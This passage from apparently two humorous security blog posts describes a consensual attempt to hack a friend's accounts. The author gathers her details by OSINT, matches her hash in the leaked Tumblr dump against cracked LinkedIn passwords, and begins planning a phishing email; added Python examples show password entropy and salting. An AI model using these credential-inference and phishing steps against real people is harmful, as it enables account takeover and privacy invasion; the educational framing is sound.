<p>Even for some HTTPS sites (which do not use Certificate Pinning or HSTS or other Dark Rituals), you can force your victim to use plain unencrypted HTTP with <a href="https://avicoder.me/2016/02/22/SSLstrip-for-newbies/">SSLStrip</a>.</p>
<hr />
<h1 id="oh-no">oh no</h1>
<p>It’s possible that reading the words on this hypertext page has made you question the bulletproof security of your own home network situation.</p>
<p>Here are some things you can do to stop worrying about your home Wi-Fi security.</p>
<h2 id="1-absolutely-nothing">1. Absolutely nothing</h2>
<p>Don’t even worry about it. The pool of people who can attack your home Wi-Fi is limited to the people in <strong>physical range</strong> of it.</p>
<p>A website like PayPal is attackable by:</p>
<ul>
<li>anyone with a computer</li>
</ul>
<p>Your home Wi-Fi is attackable by:</p>
<ul>
<li>anyone near your house</li>
</ul>
<p>What I’m saying here is that <strong>the chance of someone with skills and motivation to hack your Wi-Fi <em>actually doing it</em> is….really small</strong>. Probably your neighbours are just that nice family and that one guy who always leaves his beer bottles in your recycling bin.</p>
<p>Anyway that guy’s not gonna hack your Wi-Fi. This is why it’s not a <em>total</em> catastrophe that most people’s Wi-Fi security isn’t very good.</p>
<p>You might leave a spare key under the mat, or not bother to lock your windows <em>even though</em> someone could easily climb through them, because you’re not worried about someone physically breaking in. In the same way, your house probably doesn’t need extra-strong Wi-Fi security.</p>
<p>So don’t worry about it! Go to the beach! Work all day to make a rich dude slightly richer! He might thank you, but probably not! Eat a cupcake! Your Wi-Fi security probably isn’t worth worrying about.</p>
<h2 id="2-enable-paranoia-mode">2. Enable Paranoia Mode</h2>
<p>“Wait what if there IS someone trying to hack my home Wi-Fi, like my local government or perhaps a particularly intelligent bird?”</p>
<p>I mean the government has far easier ways to spy on you, but if you <em>really</em> want to tighten up your Wi-Fi security, you can:</p>
<ul>
<li>
<p>Use WPA2-PSK, and change the Wi-Fi password to something unguessable but easy to share (for your guests, of course).
Good examples include <code class="language-plaintext highlighter-rouge">fresh*life*fresh*mangoes</code> and <code class="language-plaintext highlighter-rouge">gday$one$internet$please</code>. Or randomly generate one like <code class="language-plaintext highlighter-rouge">gV@3AdSKouI&*3Wj</code> if you hate your guests and love typing.</p>
</li>
<li>
<p>Install custom router firmware like <a href="https://www.dd-wrt.com/site/index">DD-WRT</a>.
This has far fewer security holes than whatever 1997 PHP spaghetti your router came with.</p>
</li>
</ul>
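<p>To put numbers on the two pieces of advice above (and on the “10 million passwords in about 10 minutes” figure from the hashcat section), here is an added Python example that is not part of the original post. It generates a passphrase in the <code class="language-plaintext highlighter-rouge">fresh*life*fresh*mangoes</code> style with a CSPRNG and compares the search space of three password styles: an English word plus a couple of digits, four words from a 7776-word list, and 16 random printable characters. The small word list, the 20,000-word English vocabulary estimate, the 72-symbol alphabet and the 7776-word list size are assumptions chosen for the illustration; the guess rate is the post’s own figure.</p>

```python
import math
import secrets

# Constructed sample word list for the demo (assumption: a real generator should
# draw from a list of several thousand words, e.g. a 7776-word diceware-style list;
# the entropy functions take the list size as a parameter so that case is computed too).
SAMPLE_WORDS = [
    "fresh", "life", "mango", "gday", "internet", "please", "beach", "cupcake",
    "router", "handshake", "pelican", "granite", "lantern", "velvet", "saffron",
    "orbit", "tundra", "quartz", "harbour", "meadow", "cobalt", "walnut", "ember",
    "fjord", "juniper", "kestrel", "lagoon", "marble", "nectar", "osprey", "pebble",
    "ripple",
]

# Guess rate the post quotes for one ordinary computer: 10 million guesses in about 10 minutes.
LAPTOP_GUESSES_PER_SECOND = 10_000_000 / 600


def passphrase_entropy_bits(word_count, list_size):
    """Entropy of word_count words chosen uniformly from a list of list_size words."""
    return word_count * math.log2(list_size)


def random_string_entropy_bits(length, alphabet_size):
    """Entropy of a uniformly random string over an alphabet of alphabet_size symbols."""
    return length * math.log2(alphabet_size)


def expected_crack_seconds(entropy_bits, guesses_per_second):
    """Expected time to hit a uniformly random secret: half the keyspace on average."""
    return (2 ** entropy_bits) / 2 / guesses_per_second


def generate_passphrase(word_count=4, words=SAMPLE_WORDS, sep="*"):
    """Passphrase in the post's fresh*life*fresh*mangoes style, drawn with a CSPRNG."""
    return sep.join(secrets.choice(words) for _ in range(word_count))


def compare_styles():
    """Entropy and expected crack time (at the post's laptop rate) for three password styles."""
    styles = {
        # assumption: ~20,000 common English words x 2 capitalisation choices x ~100 digit suffixes
        "word+digits": math.log2(20_000 * 2 * 100),
        # four words from a 7776-word diceware-style list
        "4 diceware words": passphrase_entropy_bits(4, 7776),
        # 16 random printable characters like gV@3AdSKouI&*3Wj (assumed 72-symbol alphabet)
        "16 random chars": random_string_entropy_bits(16, 72),
    }
    return {name: (bits, expected_crack_seconds(bits, LAPTOP_GUESSES_PER_SECOND))
            for name, bits in styles.items()}


if __name__ == "__main__":
    print("example passphrase:", generate_passphrase())
    for name, (bits, seconds) in compare_styles().items():
        years = seconds / 86400 / 365
        print(f"{name:18s} {bits:6.1f} bits  ~{years:.3g} years at laptop speed")
```

<p>The word-plus-digits style lands inside the post’s ten-minute figure (about two minutes expected at that rate), while the four-word passphrase, which is still easy to read out to a guest, needs thousands of years, and the 16 random characters are off the chart. That gap is the whole reason for recommending the long passphrase over the pet-name-plus-house-number pattern.</p>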
<hr />
<h1 id="wait-so-have-you-ever-actually-used-this">“Wait so have you ever actually used this?”</h1>
<p>Thanks for taking the time to read this blog post.</p>
<hr />
<p><em>Big ol’ thanks to these <a href="https://rissole.github.io/alexandhorachio/game/">heroes</a> for their large brains which showed me how to do words more good.</em></p>
<p><em>If you want to talk to me about this, <a href="https://twitter.com/mangopdf">@ me on Twitter</a> I guess.</em></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:corrections" role="doc-endnote">
<p>WARNING this is a simplification (read: wrong), there’s actually a chain of keys computed from the actual Wi-Fi password. It boils down to the above idea, tho, sorry for tricking you I’m just protecting you from the harsh truth, son. If you want the real deal and aren’t afraid of death by acronyms check out <a href="https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work">this stackoverflow answer.</a> <a href="#fnref:corrections" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:wrongagain" role="doc-endnote">
<p>Again, this is a simplification for readability. <a href="#fnref:wrongagain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hashing" role="doc-endnote">
<p>Okay look this isn’t really a hash and “hashed” and “encrypted” are used pretty much interchangeably in this article which I <em>know</em> is wrong and really upsets a lot of pedantic people on Twitter but boy does it make this post easier to understand for people who are still learning anyway thanks for reading and as always do not @ me <a href="#fnref:hashing" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p><em>mangopdf: Hacking Wi-Fi, cracking passwords, and spying on mysterious handshakes is an easy game for babies.</em></p>
<hr />
<h1 id="operation-luigi-how-i-hacked-my-friend-without-her-noticing">Operation Luigi: How I hacked my friend without her noticing</h1>
<p><em>Posted 2017-08-04</em></p>
<p><img src="https://i.imgur.com/xgqR3Ss.png" alt="intro" /></p>
<p>Hello and welcome to a blog post. I am writing it and you are reading it. It’s amazing what we can do with computers these days.</p>
<h1 id="several-months-ago">Several months ago</h1>
<p>I’m at a ramen place with my friend Diana. Diana isn’t her real name, but we’re going to pretend it is because that’s what all the cool journalists do and I wanna fit in too so don’t ruin this for me okay.</p>
<p>I ask her if it would be okay for me to try and hack all her stuff. She’s instantly visibly excited. I explain how this could result in me seeing everything she’s ever put on a computer ever. She tells me she thinks this is going to be “so good”. We lay down some rules:</p>
<ul>
<li>I’ll start some time in the next 12 months</li>
<li>No deleting anything she has</li>
<li>No disrupting her daily life</li>
<li>Stop asking if she’s sure it’s okay</li>
</ul>
<p><em>Bonus rule from me: Do this entire thing in stealth mode. Don’t ever let Diana know that I’ve started until it’s too late.</em></p>
<p>I mean, <em>obviously</em> it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I’ll guide you through what I tried, my many flubs<sup id="fnref:flubs" role="doc-noteref"><a href="#fn:flubs" class="footnote" rel="footnote">1</a></sup>, and how to protect yourself from what I did<sup id="fnref:fate" role="doc-noteref"><a href="#fn:fate" class="footnote" rel="footnote">2</a></sup>.</p>
<p>And uh also at the end Mario’s green friend is there.</p>
<h1 id="part-1-research">Part 1: Research</h1>
<h2 id="open-source-intelligence-gathering-aka-googling-furiously-and-pretending-you-went-to-uni-for-this">”"”Open Source Intelligence Gathering””””” AKA googling furiously and pretending you went to uni for this</h2>
<p>Alright uh I’m pretty sure the first thing you do when you’re hacking someone is find all their personal information. I’m talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.</p>
<h2 id="jeez-were-gonna-need-to-know-her-email-address-arent-we">Jeez we’re gonna need to know her email address aren’t we?</h2>
<p>People put lots of their information on LinkedIn (an <em>information landscape</em> that connects your inbox to people you met once in a bar and will forever file under “misc”) because it tells them to.</p>
<p>The first thing I see on Diana’s LinkedIn<sup id="fnref:findinglinkedin" role="doc-noteref"><a href="#fn:findinglinkedin" class="footnote" rel="footnote">3</a></sup> is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I’m <em>in</em><sup id="fnref:hackervoice" role="doc-noteref"><a href="#fn:hackervoice" class="footnote" rel="footnote">4</a></sup>. Immediately I sigh and put my hands on my temples like a stressed-out banker. It’s a @hotmail.com address, which surprises me since, well, who’s using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you’d miss out on gmail’s excellent security features heyoooo</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [x] email address
[ ] the respect of my peers
</code></pre></div></div>
<h3 id="does-she-use-this-email-for-twitter">Does she use this email for Twitter?</h3>
<p><img src="https://i.imgur.com/mQs1pgB.png" alt="twitterpw" /></p>
<p>Yep.</p>
<h3 id="how-about-her-phone-number">How about her phone number?</h3>
<p>I type a bunch of extremely clumsy things into Google. I’m talkin’ “dianalastname@hotmail.com phone”. A matrix of what looks like zeroes and ones but is actually Google search results flies down my screen at about the speed a normal person would scroll at.</p>
<p>There’s a sign-up page for a club she started at her university. The page says “Contact Diana Lastname at dianalastname@hotmail.com or [her phone number]”. pew pew got ‘em.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[x] email
[x] phone number
[ ] the respect of my peers
</code></pre></div></div>
<h3 id="storing-the-goods">Storing the goods</h3>
<p>I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.</p>
<p>While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam “pet”, “cat”, and “dog” in that search box like it’s 2009. The name of someone’s pet is often somehow involved in their security, either as their password or as a “Security””” question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.</p>
<h2 id="lets-try-getting-into-her-icloud-account">Let’s try getting into her iCloud account</h2>
<p>Armed with my weapons-grade Google Doc, I’m ready to have a go at trying to get into something of Diana’s<sup id="fnref:haventrealised" role="doc-noteref"><a href="#fn:haventrealised" class="footnote" rel="footnote">5</a></sup>.</p>
<p>I don’t really have a good reason for going after iCloud, so if you could just give me a break for <em>one second</em></p>
<p>If I click “Forgot Apple ID?” on iCloud, by entering Diana’s full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.</p>
<p>I’m clicking around and there’s a section called “account recovery”. Sure, I’ll have a go.</p>
<p>I can recover the account by clicking “I’ve uh lost my phone and forgot my password AND locked out of my email”. Apple says “okay you colossal bozo, fine, but give us a phone number you CAN access, and we’ll SMS you instructions to get back into your account”. If I was in a movie doing <em>~crimes~</em> then I’d use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like “We received your request and will get back to you within 4 to 6 <em>business millennia</em>. Our <em>Neo-Future Customer Service Representatives</em> will contact your <em>next-of-kin</em> by whatever means of communication is prevalent at the time.”</p>
<p>There’s another “account recovery” option that says “use a device you already have”. I click this, hoping to get a list of Diana’s Apple devices. Instead it gives me this:</p>
<p><img src="https://i.imgur.com/dQmdZUM.png" alt="flubs" /></p>
<p>Daaaaaaaaaaaaaaaammmmit.</p>
<p>I have taken the wrong path in this text adventure game.</p>
<p>I’ve just notified Diana that someone’s trying to reset her account.</p>
<p>For me that would set off all kinds of alarm bells and I’d start furiously investigating what’s going on with all my accounts because I’m very cool and collected. But I’m just going to hope that Diana is a normal human being who is <em>not</em> obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like “blah blah account blah” or “blah blah new sign in blah” because I mean who <em>really</em> has time for those we’ve all got places to go and phones to scroll I mean <em>reallY</em> who’s gonna pay attention to <em>one liTtlE email</em> when there’s a whole OCEAN of low quality memes to scroll past on Facebook? I mean <em>wouldn’t you rather</em> see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- <em>oh wow lOok</em> this one’s about your local government, <em>wowee</em> they’ve even managed to use the meme font while standing their ground and writing all the text as though it’s a trying-to-sound-formal letter from your school principal who is still desperately trying to combat cyberbullying using nothing but stern words and beginning every sentence with “In regards to….”</p>
<p>There’s no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.</p>
<h2 id="several-days-later">Several days later</h2>
<p>My phone rings. I can feel the vibration in my pocket and I’m like “is someone <em>calling</em> me here in the year of our lord 2017 I can’t believe this”. I don’t recognise the number.</p>
<p>“Hello?”</p>
<p>“Hi, who am I talking to?”</p>
<p>“It’s uh Alex.”</p>
<p>“Alex?”</p>
<p>“Yeah.”</p>
<p>“Alex <code class="language-plaintext highlighter-rouge">&lt;my last name&gt;</code>?”</p>
<p>“Uh, noooo it’s-”</p>
<p>“Ohhhhhhhhhhhhh.”</p>
<p>“Wait so who am <em>I</em> talking to?”</p>
<p>It’s Diana.</p>
<p>“What’s up?”, I ask.</p>
<p>She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.</p>
<p>I hit pause on this whole thing, immediately own up, and say “yep, that was me, no need to worry, and I didn’t get anywhere, your iCloud account is safe and s- WAIT a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn’t you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??”</p>
<p>She didn’t have a plan. She just called it as soon as she saw it, the <em>absolutely</em> off-the-rails lunatic.</p>
<p>We have a nice chat and agree to hang out later. She asks me if I’ve “hacked her already”, and I say “no comment” to preserve my so-far flawless operational security.</p>
<p>Before I hang up, I wanna show off my work so far.</p>
<p>“Hey Diana, one more thing”</p>
<p>“Yeah?”</p>
<p>“Check it out. Did you ever play a game called…….. Fashion Fantasy Beach?”<sup id="fnref:fantasybeach" role="doc-noteref"><a href="#fn:fantasybeach" class="footnote" rel="footnote">6</a></sup>, I say, coolly and relatably.</p>
<p>Diana freaks out and starts laughing. She’s forgotten about this game and me reminding her of her account brings back good memories.</p>
<p>“Can you like, find all the accounts I had on all those game websites?”</p>
<p>Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It’s just not that simple.</p>
<p>“By the way, just checking, it’s still okay for me to try and hack all your stuff right?”
“SO okay”</p>
<h1 id="part-2-hackinggggg">Part 2: Hackinggggg</h1>
<p>At this point I could reset Diana’s password for some services by answering her “Security””” Questions with all the information I’ve gathered.</p>
<p>But, I realise, far too late and to the live studio audience’s disappointment, that would violate the “don’t interfere with her daily life” part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily.
This will uh heavily involve <em>knowing</em> her password rather than resetting it.</p>
<p>For a long time I consider doing the renaissance-era “send ‘em a word doc with a macro in it to get control of their computer then submit to defcon” but I worry that sweet young millennials like Diana don’t even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second <em>look it up</em>.<sup id="fnref:googledocs" role="doc-noteref"><a href="#fn:googledocs" class="footnote" rel="footnote">7</a></sup></p>
<p>I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I’m basically halfway there.
If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc.
My cyber attack vector cyber entry point exploit would then be <em>typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software</em>.</p>
<h2 id="the-shady-password-market">The shady password market</h2>
<p>Alright listen we’re about to go into password paradise so buckle whatever it is you normally buckle.
Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone’s username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~<em>dark web</em>~, for free or for money.
Conveniently, there’s a website (https://haveibeenpwned.com) which lets you type in your email address (<em>not</em> your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.</p>
<p>But…. nowhere does it say you have to type in <em>your</em> email address. Cunningly, I type dianalastname@hotmail.com, executing hacking.</p>
<p><img src="https://i.imgur.com/Uh13Flz.png" alt="hibp" />
<img src="https://i.imgur.com/TuR0lfl.png" alt="hibp2" /></p>
<p>Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to <em>acquire</em> the Tumblr database leak from 2013.</p>
<h3 id="lets-get-the-old-tumblr-database">Let’s get the old Tumblr database</h3>
<p>I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say “how much?” (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say “nothin’ personal, kid”, and hoverboard-kickflip into the night.</p>
<p>…I download the Tumblr database from a publicly accessible, unauthenticated, absolutely non-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I’m <em>in</em>.</p>
<h2 id="ancient-forbidden-password-rituals">Ancient forbidden password rituals</h2>
<p>The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>coolrelateabledude123@gmail.com:3a1920ceb2791d034973c899907847cb58810808
</code></pre></div></div>
<p>That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can’t unscramble it. If you know the password though, you can scramble it and get the same omelette, <em>if ya know what I’m sayin’</em>🍳.</p>
<p>My goal here is to figure out what Diana’s <em>actual</em> password is, given that I have her password hash. This process is commonly known as “hacking”.</p>
<p>These particular passwords are not just hashed, but also salted<sup id="fnref:salted" role="doc-noteref"><a href="#fn:salted" class="footnote" rel="footnote">8</a></sup>. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, <code class="language-plaintext highlighter-rouge">cooldad64</code>, they’d hash <code class="language-plaintext highlighter-rouge">cooldad64HNc62V8</code>.</p>
<h2 id="finding-the-salt">Finding the salt</h2>
<p>There’s no official information on what kind of hashes are in <code class="language-plaintext highlighter-rouge">Tumblr.txt</code>.</p>
<p>The fully sick attack I want to do is: hashing a big list of passwords I <em>just happen to have lying around wow</em> and checking if any of the hashes match Diana’s password hash. This is called a “dictionary attack”, because the person who invented it was actually a dictionary. The trouble is, you need to know the salt to do this.</p>
<p>I google around some more, bask in the glory of <em>very</em> poorly constructed sentences on some <em>~hacker forums~</em>, and ask my <em>~hacker connections~</em> in an attempt to find out what the salt is.</p>
<p>But I can’t find it because fun fact I’m a total fraud.</p>
<h2 id="can-i-get-the-password-without-the-salt">Can I get the password… without the salt?</h2>
<p>So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabes like me?</p>
<p>The trouble is…. They stick the same thing (in my example, <code class="language-plaintext highlighter-rouge">HNc62V8</code>) on the end of <em>every</em> password. This isn’t considered the best practice here in the year of our lord 2017, because it means that users with the same password have the same password hash.
The emails and salted passwords (just before hashing) would look like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>markjohnson64@email.com:cooldad64HNc62V8
chicago.tony1@email.com:cooldad64HNc62V8
patriotsfan69@email.com:p@triots69HNc62V8
iamsherlocked.ravenclaw@email.com:Bongo1HNc62V8
</code></pre></div></div>
<p>I search <code class="language-plaintext highlighter-rouge">Tumblr.txt</code> for not <code class="language-plaintext highlighter-rouge">dianalastname@hotmail.com</code>, but for her password hash. (<code class="language-plaintext highlighter-rouge">3a1920ceb2791d034973c899907847cb58810808</code>)</p>
<p>I find more than <strong>20 Tumblr users with the same password</strong> as Diana aw yeah</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[REDACTED]@email.com:3a1920ceb2791d0...
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
</code></pre></div></div>
<p>This makes me think that Diana’s password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.</p>
<p>But <em>also</em>. Now I’ve got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I’ve got a way to find Diana’s password.</p>
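<p>The two passages above describe the weakness from both ends: one site-wide salt means equal passwords produce equal hashes, so grouping a dump by hash reveals who shares a password. The following Python is an added example, not the post’s code and not Tumblr’s actual scheme. It hashes a constructed four-user table both with a single shared salt (a toy SHA-1 scheme resembling the one described) and with a per-user random salt plus a slow key-derivation function, then runs the same duplicate-hash check over each table. The user records and the salt value are the post’s own illustrative ones; the PBKDF2 iteration count is an assumption.</p>

```python
import hashlib
import hmac
import os

# Constructed sample user table, taken from the post's illustration (not real accounts).
USERS = {
    "markjohnson64@email.com": "cooldad64",
    "chicago.tony1@email.com": "cooldad64",
    "patriotsfan69@email.com": "p@triots69",
    "iamsherlocked.ravenclaw@email.com": "Bongo1",
}

# The post's example of one fixed salt appended to every password.
SITE_SALT = "HNc62V8"


def hash_with_site_salt(password, site_salt=SITE_SALT):
    """Toy version of the scheme the post describes: SHA-1 over password + one site-wide salt.
    Included only to demonstrate the weakness; do not store passwords this way."""
    return hashlib.sha1((password + site_salt).encode("utf-8")).hexdigest()


def hash_with_user_salt(password, salt=None, iterations=200_000):
    """Hardened form: a fresh random salt per user and a slow KDF (PBKDF2-HMAC-SHA256 here;
    bcrypt, scrypt or Argon2 are equally good). Returns 'salt_hex$digest_hex' so the salt
    is stored next to the digest. The iteration count is an assumed, deliberately slow value."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt.hex() + "$" + digest.hex()


def verify_with_user_salt(password, stored, iterations=200_000):
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(digest.hex(), digest_hex)


def duplicate_hash_groups(table):
    """Group accounts whose stored hashes are byte-for-byte identical.
    Run over your own credential table, a non-empty result means users who share a
    password also share a hash, i.e. the salt is shared or missing."""
    groups = {}
    for email, stored in table.items():
        groups.setdefault(stored, []).append(email)
    return {h: emails for h, emails in groups.items() if len(emails) > 1}


def demo(iterations=200_000):
    """Hash the same users both ways; only the shared-salt table leaks the shared password."""
    site_table = {e: hash_with_site_salt(p) for e, p in USERS.items()}
    user_table = {e: hash_with_user_salt(p, iterations=iterations) for e, p in USERS.items()}
    return duplicate_hash_groups(site_table), duplicate_hash_groups(user_table)


if __name__ == "__main__":
    leaked, safe = demo()
    print("shared site salt, duplicate groups:", leaked)  # one group: the two cooldad64 users
    print("per-user salt, duplicate groups:", safe)       # {}
```

<p>Running <code class="language-plaintext highlighter-rouge">duplicate_hash_groups</code> over a credential table you are responsible for is a cheap audit: if any group comes back, the hashes are not per-user salted, and a leak of that table would expose password sharing exactly the way the post goes on to exploit. The slow KDF is the second half of the fix; it is what turns “10 million guesses in 10 minutes” into something far less comfortable for whoever downloads the dump.</p>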
<p>I <em>just so happen AGAIN WOW WHATTA GUY</em> to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam <a href="https://en.wikipedia.org/wiki/2012_LinkedIn_hack">hacked</a> in 2012<sup id="fnref:nolinkedin" role="doc-noteref"><a href="#fn:nolinkedin" class="footnote" rel="footnote">9</a></sup>.</p>
<p>Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?</p>
<p>LinkedIn also hashed their passwords in 2012, but they didn’t add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure<sup id="fnref:insecure" role="doc-noteref"><a href="#fn:insecure" class="footnote" rel="footnote">10</a></sup> (SHA1 for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available <em>in plain text, not even hashed at all</em> thanks to the hard work and GPU cycle donations of people in the password cracking community.</p>
<p>I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look <em>them</em> all up in the LinkedIn dump. They’re not all in there, but good enough baybee.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:killer6
[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:qwerty1
</code></pre></div></div>
<p>More than 80% of them have the same LinkedIn password. (Which we will say is <code class="language-plaintext highlighter-rouge">qwerty1</code>.)</p>
<p>This has <em>gotta</em> be Diana’s password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password <code class="language-plaintext highlighter-rouge">qwerty1</code> on LinkedIn, it’s very likely that Diana’s Tumblr password is <code class="language-plaintext highlighter-rouge">qwerty1</code>.</p>
<p>I try to log in to her Hotmail account with the password <code class="language-plaintext highlighter-rouge">qwerty1</code>.</p>
<p>“Incorrect password”</p>
<h2 id="wait-please-this-was-supposed-to-be-easy-please-no-why-is-it-like-this-dont-do-this-to-me">Wait please this was supposed to be easy please no why is it like this don’t do this to me</h2>
<p>Oh <em>come on</em> I was supposed to be hacking a <em>normal person</em> who uses the same password for everything this isn’t fAiR. There are entire criminal <a href="https://www.owasp.org/index.php/Credential_stuffing">industries</a> built on the idea that people use the same password all over the place because <em>nobody cares enough to remember more than a few passwords</em> because they’ve <em>got things to scroll on their phone</em> okay.</p>
<p>Somehow, Diana is one of the <em>rare few people</em> who is not a security expert but has <em>more than one</em> password for her stuff.</p>
<p>I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on <em>none</em> of them<sup id="fnref:passwordguessing" role="doc-noteref"><a href="#fn:passwordguessing" class="footnote" rel="footnote">11</a></sup>.</p>
<p>On Facebook, I’m conveniently informed that this password <em>was</em> her password 5 months ago, but isn’t any more.</p>
<p><img src="https://i.imgur.com/S6nK5tL.png" alt="fbpassword" /></p>
<p>Looks like I just missed out. The plot thickens audibly.</p>
<p>This was supposed to be the part where I say “and then I logged into her email 100% stealthily”, equip my third consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on <code class="language-plaintext highlighter-rouge">haveibeenpwned.com</code> at the time, so there goes that.</p>
<p>Fiiiiiiiiiiine whatever I don’t even care I’m not crying, you’re crying. Time to do this the old fashioned way. And by “the old fashioned way” I of course mean “the way government hackers do it”.</p>
<h1 id="part-3-hackinggggg-again">Part 3: Hackinggggg (again)</h1>
<h2 id="social-engineering">Social engineering</h2>
<p>Alright so we’re just going to trick her into telling me her password.
Is that cheating? Basically. But <em>absolutely</em> I’m going to do it anyway.</p>
<p>To get into her email, I need to <em>know</em> Diana’s email password. Resetting the password won’t work (since that would interrupt her life by locking her out of her email). I don’t really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.</p>
<p>You may have heard of “phishing”, the process of emailing someone and tricking them into doing something, like giving you their password.</p>
<p>Now, hold up bucko, you’re probably thinking of the kind of phish where someone says “good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me” etc. etc.</p>
<p>Or maybe you’re thinking of someone sending an email that says “[heavy breathing] pls clikc on my urls <a href="http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe">http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe</a>”</p>
<p>But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not only steal Diana’s password, but do it without Diana realising she’s been tricked.</p>
<h2 id="hand-crafting-artisanal-phishing-emails-to-sell-at-the-sunday-markets">Hand-crafting artisanal phishing emails to sell at the Sunday markets</h2>
<p>Let’s write down what we want to do:</p>
<ul>
<li>Get Diana’s email password</li>
<li>Don’t let her realise that the email is not legit</li>
</ul>
<p>Hmm I guess there were only two dot points uhh sorry that doesn’t seem worth having dot points at all ummmm</p>
<p>So anYwAy the trick to phishing is that you don’t want to engage the victim’s attention. You want them to interact with your email mindlessly, without thinking it’s a big deal. Kinda like how you click through email notifications from Twitter (or anything that sends you email notifications) without really thinking about the email, because you’re thinking about what awaits on the other end.</p>
<p>The <em>other</em> way, rather than distracting the victim, is to misdirect them. You give them something that’s <em>way</em> more interesting to pay attention to than your dodgy link. Common examples of this include emails that say “OMG your account has been HACKED, log in here to fix it”.</p>
<p>But of course, you log in to a fake website which steals your password.</p>
<p>Wow actually that sounds pretty<sup id="fnref:pretty" role="doc-noteref"><a href="#fn:pretty" class="footnote" rel="footnote">12</a></sup> easy<sup id="fnref:easy" role="doc-noteref"><a href="#fn:easy" class="footnote" rel="footnote">13</a></sup> doesn’t it? Let’s try that then.</p>
<p>I’ll make an email that says “Your Microsoft Account Has Been Hacked And Uh If You Don’t Log In Now It Will Get Deleted So Uh Yeah You Better Log In”.</p>
